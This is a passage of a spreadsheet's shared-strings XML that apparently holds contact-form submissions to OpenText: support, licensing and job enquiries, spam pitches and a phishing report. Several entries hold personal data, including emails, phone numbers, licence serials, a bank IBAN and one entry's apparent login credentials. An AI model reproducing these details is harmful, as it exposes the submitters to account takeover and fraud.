7. Wird spezielle Hardware benötigt (Dongle, Lesegeräte, Drucker)?_x000D_
8.  Werden Schreibrechte auf bestehende Verzeichnisse benötigt? (Adminrechte)_x000D_
9. Handelt es sich um Software, die Teil eines Systems (z.B. Messsystems) ist?_x000D_
10. Gibt es eine Alternativlösung seitens des Herstellers (z.B. Webbasierte Lösung)?_x000D_
_x000D_
_x000D_
Vielen Dank!_x000D_
</t>
  </si>
  <si>
    <t>Good Morning! I was curious if there is study guides/books/material for the EnCE certification?  And if so, where could I obtain them prior to taking the exam?  Thank you1</t>
  </si>
  <si>
    <t xml:space="preserve">Connect to rightfax. </t>
  </si>
  <si>
    <t>i need to reset my user id and password</t>
  </si>
  <si>
    <t>OpenText can be integrated with Juris in Brazil former language, Portuguese?</t>
  </si>
  <si>
    <t>asdfasdf</t>
  </si>
  <si>
    <t>AAA最主要AAAzzzzzzz</t>
  </si>
  <si>
    <t>Hello,_x000D_
I work as Solution Architect ECM systems. I have more 25 years experience with IXOS, Documentum, Alfresco. Can you send me information to connect knowledge_opentext_com. I was account on community_emc_com for Documentum information and I need update information about Documentum for my project._x000D_
Thansks._x000D_
Miroslav</t>
  </si>
  <si>
    <t>Trying to reset password, but it keeps saying updating password failed.</t>
  </si>
  <si>
    <t>We'd like to view the available training for the conference in Toronto before we register our team.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour, _x000D_
_x000D_
Dans le cadre de notre projet de gestion des réclamations et questions clients nous souhaiterions bénéficier d'une démo de vos solutions de Gestion d'expérience client et plus particulièrement de gestion des plaintes clients (Case 360) et des communications clients (exstream). _x000D_
_x000D_
La démo aura de préférence lieu en français et à distance. _x000D_
_x000D_
Cordialement, _x000D_
_x000D_
Anne-Lise Wuidar </t>
  </si>
  <si>
    <t>ASC Industries has an existing WebDx account we are populating with outbound Purchase order and purchase order change transactions.  Interested in receiving inbound Advance Shipment Notice and Invoice transactions in ANSI-X12 format from the WebDx trading partners.  Please contact me regarding options and costs to implement.</t>
  </si>
  <si>
    <t>Need to understand licensing requirements to add an additional ERP system to OpentText software.  Please contact me.  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Für unseren Endkunden sind wir auf der Suche nach einem OpenText Spezialisten im Großraum Bonn für Mitte/Ende Februar. Es handelt sich hierbei um ein langfristiges Projekt mit 230 AT geplant bis Mitte 2020._x000D_
 _x000D_
Gerne lasse ich Ihnen weitere Details zukommen. _x000D_
 _x000D_
Herzliche Grüße,_x000D_
Evelin Dammert_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Bonjour, J'ai reçu ma licence exceed 15, j'ai bien un numéro de série et un SUID. Maintenant j'ai besoin de télécharger exceed  15, je vois que c'est dans My Support mais je n'ai pas accès à My Support , ça me demande "Product line", "End user number", "Co-worker" et "System ID/serial number/PIN/VPS". Je n'ai pas toutes ces infos. Pouvez-vous m'aider rapidement? J'ai appelé votre support par tel mais la personne n'a pas réussi à me répondre._x000D_
Cordialement, Hélène PILA</t>
  </si>
  <si>
    <t>Hi,_x000D_
Is it possible to set up a demo of Metstorm BPM to answer some of our questions?_x000D_
Thanks,_x000D_
Roberta</t>
  </si>
  <si>
    <t xml:space="preserve">Buongiorno, nel 2014 acquistammo la licenza di Exceed 14_x000D_
_x000D_
SERIAL NUMBER _x000D_
S-EXMPI550101M_x000D_
_x000D_
Siccome siamo in procinto di cambiare sistema operativo e dovremmo passare da Win 7 a Win10, chiedo se dobbiamo acquistare una licenza nuova o se va aggiornata la nostra esistente._x000D_
_x000D_
Grazie_x000D_
Saluti_x000D_
Alessia Cacciari_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Emergency </t>
  </si>
  <si>
    <t>What is the cost of an cloud content management solution for a 6 person company?</t>
  </si>
  <si>
    <t>Work</t>
  </si>
  <si>
    <t>I need job</t>
  </si>
  <si>
    <t>Request for information on a cloud based Electronic Document Management System (SAAS) for use during the construction phase of Major Infrastructure Development.</t>
  </si>
  <si>
    <t xml:space="preserve">The link to the OpenText Email Monitoring for Microsoft Exchange Solution Overview pdf document on Opentext-dot-com is broken. </t>
  </si>
  <si>
    <t>Interested in RightFax solution integration for Netsmart Homecare EHR platform.</t>
  </si>
  <si>
    <t>HI,_x000D_
I'm attending the VIM bootcamp in a couple of weeks and will be supporting a couple of customers - can I have access to VIM Support please?_x000D_
Regards,_x000D_
Mike.</t>
  </si>
  <si>
    <t>aa首席阿里巴巴zzzzzzzzzzz</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
Could you please assist me knowing the details below regarding "Media Management Connector for Content Server"_x000D_
1. Latest release (patch details), release date and release notes._x000D_
2. Until when is the product supported by OpenText? any defined EOL_x000D_
3. From where we can access the above details from OpenText website for future reference_x000D_
Please note that right now I do not have access to the knowledge base so requesting you to provide me the details in an email.</t>
  </si>
  <si>
    <t>we have an project on open text system and we need to contact with YOU ASAP</t>
  </si>
  <si>
    <t>I got a call back after my initial request however it was not a good time and I requested an email correspondence. Kindly return by call tomorrow or email. interested in documentum for pre-clinical data management. Many thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Because I need a job and I'm a hard worker </t>
  </si>
  <si>
    <t xml:space="preserve">I'm not able to use the support portal although I'm registered and have confirmed my e-mail address. I run into a screen after login to "My Support" that says that the e-mail is recognized but that I have not yet confirmed my e-mail. I've done that twice now and it still wont let me access. _x000D_
_x000D_
Can you please help. _x000D_
_x000D_
Br, _x000D_
Björn_x000D_
</t>
  </si>
  <si>
    <t>Is the company still recruiting for an internship? If it is, what position are available?</t>
  </si>
  <si>
    <t xml:space="preserve">We are planning Tech-Refresh for our server from Windows server 2008/R2 to Windows server 2016. _x000D_
For that we need compatibility information of following applications with Windows server 2016. In case the current application version is not compatible kindly suggest a compatible one._x000D_
_x000D_
Applications are as below:_x000D_
1. OpenText WSM Content Server DM Interface_x000D_
2. Open Text Web Site Management Server 10.1_x000D_
</t>
  </si>
  <si>
    <t>Ghhjjc</t>
  </si>
  <si>
    <t>Need the estimated license cost for Open text content server having around 1500 users and 500 GB data. Is the license cost is based on number of users or data size.</t>
  </si>
  <si>
    <t>I need a quote for EnCase please</t>
  </si>
  <si>
    <t>To know more about the Web Content Management System.</t>
  </si>
  <si>
    <t>Sorry! Something went wrong._x000D_
Your request couldn't be completed at the moment._x000D_
_x000D_
We suggest returning to the previous page and trying again._x000D_
_x000D_
Go Back_x000D_
If you're still having difficulty, contact Cvent's Support Team with the information below._x000D_
Time_x000D_
Thu Jan 17 2019 11:04:37 GMT 0800 (Singapore Standard Time)_x000D_
Instance ID_x000D_
bae2fb55-9daa-4b35-87d8-0a5c993f2836_x000D_
Page Load ID_x000D_
7c43a041-f10d-499f-9c10-cf26e2476b66</t>
  </si>
  <si>
    <t>I'm a fresher ,I would to join our comapny , as a  traine because it is one of the good company . It provide  a lot of opportunity  to grow our technical skill .so can I apply , please reply me fast , thaknyou for you.</t>
  </si>
  <si>
    <t>Unable to access support website using scott.bergman@yrcfreight.com.  Account has paid support.    I completed the verification process, yet have received this message for the last two days. "Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us."_x000D_
_x000D_
I am needing assistance with a general Encase support question and also beginning planning for our next Encase application upgrade.</t>
  </si>
  <si>
    <t>I have set up my email account to forward all emails to my personal email account, but nothing is forwarded. I've also tried the 'redirect' option, still nothing. Could you help me resolve this issue. Thanks.</t>
  </si>
  <si>
    <t>Hi._x000D_
This is just to let you know that I received a phishing email purporting to be from the CEO of OpenText, Mark Barrenechea.  It was received to a group email address that would likely relate to info@invest-e-gate.com.  The return path/reply to on the email address to Mark Barreenechea &lt;salesmail@mail.com&gt;.  The email was requesting information of invoices and trying to insight contact.  Given the content I suspect that they have found our email address as we used to sell Guidance Software products and provide training and our contact details are still on the Guidance site.  While this is not a specific vulnerability of OpenText, you may wish to warn vendors of the this phishing scam and impersonation attempt.  I have a screenshot if you would like.  As a company that works in the security and forensics space, I thought you would like to be notified and may wish to notify or warn others.  You may also be able to report the reply-to address for spam/phishing, very small impact on the attackers but can help detection mechanisms in flagging spam and phishing._x000D_
_x000D_
Regards_x000D_
_x000D_
Scott</t>
  </si>
  <si>
    <t>Hi, I registered our acct and confirmed the email address, but still can't login to support site, please advise how can I access knowledgebase info, my login id is szhu@progressiveintl.com, thanks! Sonia Zhu</t>
  </si>
  <si>
    <t>Hi Team, While Reviewing - "OpenText_Content_Server_10.5_Release_Notes".  We have our current Open Text Content Server is on Windows 2012 R2 SP1, so we are in the process of upgrading to latest SP level that is 2012 R2 SP4, however in the release notes, we see supported version is only 2012 R2 SP3, is that true? SP4 is not supported?  Please confirm.  Also we would appreciate if you can share the advantages of upgrading to latest SP level (from 2012 R2 SP1 -&gt; 2012 R2 SP3/SP4) from open text point of view.  Thank you.</t>
  </si>
  <si>
    <t>Requesting access to forums and product information. I am an opentext support person from VicRoads, currently using content server 10.5.2</t>
  </si>
  <si>
    <t>I'd like to get a contact in your sales organization to whom I can refer potential RightFax customers from our customer base. Our company recently launched a service to load Fax Files received by RightFax via the RightFax API.  As this service has gotten traction, a number of our customers who do not use RightFax would like to consider it.  I'd like a standard contact in your company to whom i can refer these potential customers to get the information they need to make decisions.  These customers are health insurance plan companies who receive a large volume of faxes every day from physicians offices seeking to get authorization to treat patients.</t>
  </si>
  <si>
    <t>Sorry to bother you but since Guidance has switched over to Opentext, I am pretty well lost trying to find anything.  Right now I am trying to find the downloads for EnCase Forensics._x000D_
I am trying to find, and install EnCase version 8.8.  If you could send me a link for same I sure would appreciate it!_x000D_
Thank you!_x000D_
Jake_x000D_
AKA Lowell V. Jacobsen</t>
  </si>
  <si>
    <t>I initiated an import job today (see ID below) along with three others to upload some slideshows to OpenText. Three were uploaded successfully and I submitted them for publishing. The last one says the status of the job is “in progress” while the current step is “completed.” When I click on the job there’s not assets in there to request for publishing it just says “No Results Found.”  Is this a common error that happens? I’m thinking it’s maybe something with the metadata but I can’t see what I’ve done wrong. Do you have any ideas?_x000D_
_x000D_
Job ID: PIz15476726532454476fef2-0169-43b7-91e9-97b5df80542a</t>
  </si>
  <si>
    <t>who can I talk to bout our contract and renewal?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
Ausenco (Customer ID 119501) has been out of maintenance since June 30, 2015. _x000D_
I would like to know what the cost would be to get it back to maintenance with the same level of services we had prior to stopping the maintenance?_x000D_
_x000D_
Also, I would want to see an estimate of having it in the newer version (same level of named users). Can this be provided as soon as possible so we can determine what direction to take?_x000D_
_x000D_
Thank you,_x000D_
Ricardo Peres_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Hope you are doing great..!_x000D_
_x000D_
This is to just remind you again regarding my last email for Web/Mobile Development and Digital Marketing. If you haven't checked my last email yet, Then here I am writing it again._x000D_
_x000D_
I am Kriestan from Elsner Technologies. We are located in Lakeland FL and partner with global company. With 12 years of experience in this industry, we have mastered the art of understanding the vision of client and delivering solutions above their expectation._x000D_
_x000D_
We provide services like Website development and maintenance, Digital Marketing, SEO, Custom software solution, Product implementation etc._x000D_
_x000D_
Our rates for development starts with $20/hr._x000D_
_x000D_
Feel free to reply me so we can discuss in detail._x000D_
_x000D_
Thanks, _x000D_
Kriestan_x000D_
Digital Consultant_x000D_
Skype:sales.elsner</t>
  </si>
  <si>
    <t>Need to know what 3D file extensions can be opened by Bravo Desktop or Desktop Viewer 16</t>
  </si>
  <si>
    <t>I need contact information for re-certifying my EnCE. Please let me know who and where to contact the appropriate person(s).</t>
  </si>
  <si>
    <t>I need to get a quote for a renewal for Oncor Electric for their Exceed maintenance (25 users).  The contract number I have listed is A211628.  We previously went through Ingram Micro for this but they no longer carry OpenText.  This is the information from the renewal quote we got last year: _x000D_
25 Exceed Single License (Electronic) Maintenance 1000025395_x000D_
03/01/18 to 02/28/19_x000D_
Unique #: 07410-12460_x000D_
(S-EXMPI550101M_M)</t>
  </si>
  <si>
    <t>I would like to request a developer training session for some of my staff. If someone could please get in touch to work out details that would be appreciated. We would like to have a group training session scheduled before the end of fiscal year.</t>
  </si>
  <si>
    <t>I need to get information as how to order 15 rightfax numbers.</t>
  </si>
  <si>
    <t>We currently utilize your Fax2Mail services through our phone vendor Vonage (originally iCore Networks). We are ending our service through Vonage on February 28th, 2019, and are interested in keeping services directly through you. What are our options?</t>
  </si>
  <si>
    <t>Ssi</t>
  </si>
  <si>
    <t>I need to know urgently the exact steps required to involve the Professional service team to solve a problem related to Archive center integrated with SAP S4HANA, and is the exact cost of this engagement</t>
  </si>
  <si>
    <t>Loan</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to obtain access to the knowledge center. </t>
  </si>
  <si>
    <t>Am trying to connect a Tableau TD3-B to NAS.  It has an ethernet port, but cannot figure out how to configure the settings to connect.  Would like to send images directly to a directory on the NAS.  Can this be done? _x000D_
Thanks_x000D_
Rob W</t>
  </si>
  <si>
    <t>When searching in Alchemy it will sometimes randomly crash Internet Explorer.</t>
  </si>
  <si>
    <t>research</t>
  </si>
  <si>
    <t>We are using DCM and I am looking for a training._x000D_
What is the difference between "Process360"  and ProcessSuite?_x000D_
_x000D_
Mar</t>
  </si>
  <si>
    <t>I am a valid TeamSite 8.2 Open Text Admin and cannot access _x000D_
No Access "Knowledgebase" to address issues_x000D_
No Access "My Support"_x000D_
Even after confirming my email. I cannot access anything after I login... It keeps looping back to please confirm._x000D_
_x000D_
This is URGENT. Please assist._x000D_
Thank You_x000D_
Reginald Thomas_x000D_
BNSF Railway_x000D_
(817)593-4034</t>
  </si>
  <si>
    <t>Looking for product information for exstream. If suitable, i would like to go ahead and have it implemented for our organization. My request for demo through online channel has not been responded.</t>
  </si>
  <si>
    <t>What is the process to renew a support contract?</t>
  </si>
  <si>
    <t xml:space="preserve">I need job am a hard workar </t>
  </si>
  <si>
    <t>I currently have Fax2mail and wanted to check how much I paid you guys in 2018. Thanks, Sal</t>
  </si>
  <si>
    <t>looking for a job</t>
  </si>
  <si>
    <t xml:space="preserve">I will like to know if you have any free training that I can participate in my trip to the conference. I am interested to understand how I can implement your solutions through my government business. The investment to go to Vienna and also training is getting a little to deep but i am interesting to learn more about your solutions. _x000D_
</t>
  </si>
  <si>
    <t>I received a failure notice when I tried to use my e-fax this morning. Is my account up to date or has my credit card expired? Please advise!</t>
  </si>
  <si>
    <t>Buongiorno questo ufficio ha necessita di attivare le 3 licenze del software encase Forensics. chiediamo di essere contattati per ricevere ausilio al numero 3204446528. grazie</t>
  </si>
  <si>
    <t>Hello, I'm Massimo from Italy. I'm an Ispector of Italy Finance Guard. I've a  problem with my opentext account. My governative administration (Guardia di Finanza - in Rome) bought some years ago, some Encase dongle licenze (G2002080214) and before last mounth it works perfectly, but now It doesn't works and iI can't enter in opentext account and dowload the new encase software. Can I know the cause? Thank you. Best regard</t>
  </si>
  <si>
    <t>Interested in opportunity to become a reseller.</t>
  </si>
  <si>
    <t>We would like to close our account.</t>
  </si>
  <si>
    <t xml:space="preserve">I have two issues. one I never get the email that is suppose to finish my registration. Two I have three users that can not open documents in Decisiv. </t>
  </si>
  <si>
    <t>Dear Sirs,_x000D_
_x000D_
I am representing Bestau - company that is a professional audio video integrator in Poland since 1991._x000D_
_x000D_
We are interested in finding out more about your product. Could you send me your price list or let me know what is the price of Exceed software? I understand that it might be volume based but what is the price even for a single license?_x000D_
_x000D_
Best regards,</t>
  </si>
  <si>
    <t>Hi, we currently have licenses for Encase 7. I'm wondering how much it would cost to upgrade them to Encase 8._x000D_
I'm not sure what my serial number is but identifiable data on the dongle that may help you: G2002061648, 1001-02-140-0021, US7.143.297, 2-2061648_x000D_
_x000D_
Kind regards,_x000D_
Amir</t>
  </si>
  <si>
    <t xml:space="preserve">Mr Thabede </t>
  </si>
  <si>
    <t xml:space="preserve">Hi There,_x000D_
_x000D_
Our company creates custom engaging animated presentation videos for businesses like yours to help increase your online exposures._x000D_
_x000D_
Animated presentation videos help companies explain their products or services more efficiently to potential customers._x000D_
_x000D_
Potential customers engage more when there’s a video presentation, most of us would rather watch a video that explains a product or a service than to read the content of a website to know what the offer is._x000D_
_x000D_
I'm interested in creating an animated presentation video for your company to help increase your online exposure! _x000D_
_x000D_
Please reply back to this message and I will send you some of our animated video samples so you can see what I can do to help your business grow this year._x000D_
_x000D_
Thank you,_x000D_
Steve S_x000D_
</t>
  </si>
  <si>
    <t>Hi team could you provide the latest version name and date for product Brava! Enterprise?_x000D_
Also I raised request to access the support and knowledge page, unable to access. If you could provide instructions on that?</t>
  </si>
  <si>
    <t>I am having problems signing into the website to pay with a credit card.</t>
  </si>
  <si>
    <t>AAA內容物AAAAA</t>
  </si>
  <si>
    <t>Our two district accounts do not have access to the My Support page, despite having purchased a support contract.</t>
  </si>
  <si>
    <t>I am new to supporting Exstream Live Editor (client), with Zero background on it and no background on mainframe.  _x000D_
I want to check with you, if there is some sort of a knowledge share I can get with your support team?  As I have info on our current environment and want to see how to move forward for upgrade, and support this product.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like a brief understanding on your ECM product. </t>
  </si>
  <si>
    <t xml:space="preserve">I would like a brief understanding on ECM product </t>
  </si>
  <si>
    <t>Looking for the job</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam:_x000D_
_x000D_
I am following up on my unanswered inquiry from last month. I have been unable to log in to my GXS catalogue for the past month. When I click on "Reset password" I did not receive a re-set e-mail. Please advise. </t>
  </si>
  <si>
    <t>PDF Conversion in SAP</t>
  </si>
  <si>
    <t xml:space="preserve">I wrote an exam for internship at opentext. I havent received any mail regarding being selected or not. I just wanted to know the status of my application_x000D_
</t>
  </si>
  <si>
    <t>My old PC that had Actuate designer/development studio was replaced over a year ago.  I have not needed to use or install Actuate until now, and require a new key for my new workstation._x000D_
_x000D_
Would it be possible to be sent the documentation required to start the process to get an updated key?_x000D_
_x000D_
Thanks,</t>
  </si>
  <si>
    <t>I understand your company owns the domain name hummingbird  and I am looking to make an offer to purchase this from you if this is possible? I can't seem to find any relevance of the domain to your business activities so thought you may be in a position to sell it?_x000D_
_x000D_
Many Thanks</t>
  </si>
  <si>
    <t>Trying to access download page but site requesting acount acitvation all the time</t>
  </si>
  <si>
    <t xml:space="preserve">Research to use Brava! as APIs under Windows OS </t>
  </si>
  <si>
    <t>I need access to MySupport but when I click on MySupport I get an error that I do not have access.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am unable to access support, Unable to log support ticket,._x000D_
Unable to download any software,_x000D_
How do i download latest version of enterprise scan._x000D_
Thanks</t>
  </si>
  <si>
    <t>My working colleague Mr Philipp Figel opened a support case and added my email address to care about the case during his absence, so I registered to get hold of this case._x000D_
Since I couldn't find out our customer number I left this field empty hoping you'd be able to match this according to delivered mail address and company name._x000D_
Unfortunately I added our official company name which does not match the name listed. (Funny you can select the company name when opening this contact form but not when registering)_x000D_
As a result I can log in but can't confirm my registration and therefore can't access any ressources. Can you please match my account to the right company? This would be helpful to carry on in this specific support case for your product._x000D_
Best regards</t>
  </si>
  <si>
    <t xml:space="preserve">Need a quote for our customer HCL America - _x000D_
Renew OpenText Exceed Support &amp; Maintenance for Multiple	12	HCL America - Sunnyvale, US	System Unique ID (SUID):07144-12406_x000D_
Serial Number: 1000025394	07-31-17	30-06-18_x000D_
Renew OpenText NFS Solo Support &amp; Maintenance for Torme	1	HCL America - Sunnyvale, US	System Unique ID (SUID):03135-12451_x000D_
Serial Number: 1000031273	08-23-17	22-07-18_x000D_
Renew OpenText Exceed onDemand Support &amp; Maintenance for Velour	10	HCL America - Sunnyvale, US	System Unique ID (SUID):04924-12425_x000D_
Serial Number: 1000025428	07-27-17	26-06-18_x000D_
</t>
  </si>
  <si>
    <t>Am unable to update my account details to add a new administrator. It's telling me that my account does not grant me access. I am an administrator, or at least I was yesterday</t>
  </si>
  <si>
    <t>for Light vehicle Driver job</t>
  </si>
  <si>
    <t>I am trying to install VIP DocView 9.1 and it keeps hanging at the end of the installation and never completes.  I need assistance finishing the installation.</t>
  </si>
  <si>
    <t>Hello, I am a Product owner from Wells Fargo and I would like to know basic details about "Media Management Connector for Content Server" product from OpenText. Can you help me with below_x000D_
1. Latest version released, release notes and release date (mandatory)_x000D_
2. Any version history of this product and link from where we can access the version history for future reference._x000D_
3. Till when the latest version is supported by OpenText. Is there any EOL defined?_x000D_
Please help me with these details as soon as possible. Thanks and your partnership with Wells Fargo is much appreciated.</t>
  </si>
  <si>
    <t>MZ</t>
  </si>
  <si>
    <t>AAAA內容AAAAAA</t>
  </si>
  <si>
    <t>Hello, we are looking for a complete workflow solution for our ecommerce studio. The studio is producing images and texts for our websites. We are keen to understand if OpenText can be the solution for us. We are interested to get to know your references in fashion industry and preferably even a use case in a studio._x000D_
_x000D_
Thank you,_x000D_
Gedis</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I recently installed the captiva software on a host and when I tried to run Captiva Administrator it gave me an error that says: "Captiva Administrator could not load the pages. Please contact the administrator." Could you help me solve this problem?_x000D_
_x000D_
Thank you very much and greetings.</t>
  </si>
  <si>
    <t>I want to get knowledge and assist as more people as possible in my community.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
ich würde gerne wissen, ob aus unserem Archiv ein selbstentpackendes Archiv erstellt werden kann und welche Kosten dabei entstehen. Die Anzahl der ISO-Files auf dem System ist: 59201_x000D_
_x000D_
Vielen Dank und beste Grüße_x000D_
Vadim Yampolskiy_x000D_
</t>
  </si>
  <si>
    <t>I am interested</t>
  </si>
  <si>
    <t>As Documentum you supplied document storage for employee personnel files for Thames Water when I worked there.  At Elis, we still have paper files and would like make the files electronic.  Is this a service you are able to provide?  I would be interested in finding out more about what information you would need, what levels of service you could offer; and of course, the cost.</t>
  </si>
  <si>
    <t>For the IT department, I have been trying to get in touch with someone recently regarding the expired hardware support on a DellEMC VXRAIL HCIA Chassis w/ 1600 PS and Fan_x000D_
, expired from hardware support on the 29th of March 2017, was someone aware of this expired support and would you be looking to renew this support?_x000D_
_x000D_
The hardware is based at Open Text UK, please let me know!_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Currently, we are planning &amp; budgeting for our Enterprise Content Management Roadmap. With this exercise we are looking at available cost sheets for this practice, particular for the implementation of Document Scanning (OCR enabled) &amp; Case Management/BPM solutions across internal organizations.</t>
  </si>
  <si>
    <t xml:space="preserve">URGENT: Access to MySupport portal </t>
  </si>
  <si>
    <t>Hi, I cannot use support or knowledge center. It says my account doesn't have access. Please let me know what I need to do to gain access again? I was able to use the account till first week of January 2019. Thanks</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
I was searching for possible training connected with IXOS Archive server in Central Europe but I am not sure, if I was looking correctly._x000D_
_x000D_
Is it possible to check, if there are any sessions this year for education related to IXOS Archive Server in Central Europe?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Hi, we're trying to contact whoever is responsible for completing assessments / surveys etc with regards to CS&amp;R, in order to invite you to review and resubmit the supplier assessment that was initially submitted last year. Our original contact jolyons@opentext.com doesn't appear to work anymore - please could you provide an alternative contact. Thank you.</t>
  </si>
  <si>
    <t>Need to know the costing details for Opentext content server.</t>
  </si>
  <si>
    <t>I am hoping to use Brava to mark up and measure PDF &amp; DWG drawings.  I understood that it could be used with macs.  I have downloaded the trial but that does not work.  Is there a mac version at all?_x000D_
Kind regards</t>
  </si>
  <si>
    <t>15.01.2019 Santa Monica Networks AS paid Invoice No 9000900479 twice. Could you please return overpayment to our accont in Swedbank AS: IBAN:EE672200221002100156, SWIFT/BIC HABAEE2X, SANTA MONICA NETWORKS AS._x000D_
Thank you in advance!_x000D_
BR!_x000D_
Kaari</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Opentext/Dataware software_x000D_
_x000D_
On behalf of our mutual customer DR (Dansk Radio/Danish Broadcasting Company ) we hereby enquire your help in creating a full purchase history of all Opentext/Dataware software software that details  ALL purchases please._x000D_
_x000D_
KMD is the largest Danish IT company _x000D_
_x000D_
We would like a spreadsheet detailing all purchases and:_x000D_
•	License name / entitlements_x000D_
•	Metric (for example pr user or pr device or pr cpu etc.)_x000D_
•	Amount of licenses_x000D_
•	start and, if an, end date of subscription_x000D_
•	Purchase date_x000D_
_x000D_
We really appreciate your kind help_x000D_
_x000D_
Here is the formal Permission from DR that authorizes you to help KMD with this purchase history_x000D_
_x000D_
_x000D_
Dear supplier_x000D_
_x000D_
We, DR (Danmarks Radio / Danish broadcasting corporation), hereby authorize  that KMD can get full access to our buying history._x000D_
_x000D_
This include _x000D_
•	License name / entitlements_x000D_
•	Metric (for example pr user or pr device or pr cpu etc.)_x000D_
•	Amount of licenses_x000D_
•	start and, if an, end date of subscription_x000D_
•	Purchase date_x000D_
_x000D_
Please supply KMD with buying history and help in creating the best license history as long back as possible_x000D_
_x000D_
As this is urgent – please answer back within 10 days_x000D_
_x000D_
We appreciate your kind help_x000D_
_x000D_
With regards_x000D_
_x000D_
_x000D_
–– –  –   –    –     –      –       –        – _x000D_
_x000D_
Maria Lund Høpfner_x000D_
Afdelingschef, Teknologisk service_x000D_
_x000D_
 _x000D_
_x000D_
DR_x000D_
København - Dr Byen_x000D_
DK-0999 København _x000D_
_x000D_
_x000D_
_x000D_
Please feel free to contact me if you have any questions regarding this email_x000D_
_x000D_
Best regards_x000D_
_x000D_
Allan Larsen_x000D_
SBU Contract Manager_x000D_
Produktsalg HW/SW _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>good morning, i need to know the exactly expiration date of my Encase license. From Encase--&gt;Help--&gt;About it resul 01.07.2028. is it right? if it's right, it means that i can use it and download update until this date? thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">I am an Adjunct Professor at Mercy College and will be teaching computer forensics in the fall. I was wondering if there was online training that I could access for Encase that has pricing for education. </t>
  </si>
  <si>
    <t>Need a training on how to handle customers</t>
  </si>
  <si>
    <t>I have account but not able to access knowledge base and also not able to raise the request</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
 We are purely a Google Local Business Listing Optimization Company; we can place your website on top of the Natural Listings on Google &amp; other search engines._x000D_
 We can fairly quickly promote your website to the top of the search rankings with no long-term contracts!_x000D_
We would be happy to send you a proposal using the top search phrases for your area of expertise._x000D_
 Do let me know if you have any Quality Backlinks SEO needs, and we could send you a Local SEO Package Pricing with details._x000D_
 Look forward to hearing from you._x000D_
_x000D_
 Kind Regards,_x000D_
Lisa Warren</t>
  </si>
  <si>
    <t>Need to access knowledge opentext website to download application (NFR)</t>
  </si>
  <si>
    <t>We want to be opentext partner for ECM solution.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am trying to make a proposal for management to get eDOCS for document control at the company. We are a small size company but growing very fast and now is the time to implement the document control._x000D_
I need to talk to someone to make a proposal including specifications and pricing to put in front of the management. I have used it previously and I know exactly what this place requires._x000D_
Regards_x000D_
Naeem khan</t>
  </si>
  <si>
    <t>Can I use Regular Expressions to search eDOCS DM?</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs,_x000D_
Hello.We are Egypt Land for export Company located in Egypt._x000D_
Our work related to the herbs &amp; vegetables &amp; fruits (dried &amp; frozen ) exporting ._x000D_
We are looking for long term business with you in the future._x000D_
We will be glade if you can send us your request in details ._x000D_
Thank you for your cooperation_x000D_
</t>
  </si>
  <si>
    <t>Set up for Bloomingdales EDI</t>
  </si>
  <si>
    <t xml:space="preserve">We have an account with you and we are completely locked out and I need help to log in. The person before me has left the company and we need access. I do have the Info that she left but it will not let me log in. _x000D_
R7149_x000D_
R7149A_x000D_
Doyle2019_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I signed up for a virtual class on Jan. 28, 2019. I have not received a confirmation or material for this class. Can someone please get back to me and let me know if I should have my material or a confirmation already?_x000D_
_x000D_
Thanks._x000D_
Hyori_x000D_
</t>
  </si>
  <si>
    <t>Implementación EDI</t>
  </si>
  <si>
    <t>Access to MySupport, installers for Documentum upgrade, licenses, knowledge base. Sempra is my client.</t>
  </si>
  <si>
    <t>I am looking to get a renewal quote for Oncor Electric's Open Text Exceed maintenance (I believe the contract # is A211628).  The current maintenance expires 2/28/19.  This is for 25 users.</t>
  </si>
  <si>
    <t>Can we get the license for version 13.4 again or transfer that license to the latest version?</t>
  </si>
  <si>
    <t>unable to reset password on support site.  "An error occurred updating password"</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to discuss options for testing an integration with your RightFax solution. Our legacy system integrated with your software to facilitate sending fax documents as an automated process and we are looking to support this as we develop our latest version of our software. </t>
  </si>
  <si>
    <t>EFax failure._x000D_
My email has been changed to chantal.gingras@sedgwick.com since Cunningham Lindsey has been bought by Sedgwick. Consequently, I can't send faxes anymore since the email migration. _x000D_
_x000D_
Can you please do the necessary to resolve this issue?_x000D_
_x000D_
Thanks in advance!</t>
  </si>
  <si>
    <t>Dear,_x000D_
Did you want to ask about how to renew Exstream certifications?_x000D_
My case is the following:_x000D_
My name is Omar Navarro and 3 years ago I obtained the certifications "HP Sales Certified - Exstream Solutions" and "HP Technical Certified I - Implementing Exstream Solutions" when I worked in a company that was an HP partner, now OpenText. In June of 2018 I retired from the company to open my own company._x000D_
My question is:_x000D_
What is the procedure that I must follow to renew my certifications and what are the available certifications?_x000D_
_x000D_
Thank you in advance for your time._x000D_
Regards</t>
  </si>
  <si>
    <t xml:space="preserve">Dear All,_x000D_
My name is Graciela de Gregorio and I contact you on behalf of the Austria Business Agency (ABA), the governmental agency for the economic development of Austria. We support and advice companies with an interest in the business location of Austria._x000D_
_x000D_
In February 2019, our representatives of the Austrian Business Agency are attending the event HIMSS 2019. We learned that your company is attending as well, and we would like to schedule a meeting to highlight the competitive advantages and incentives that Austria as a Central European Hub has to offer. _x000D_
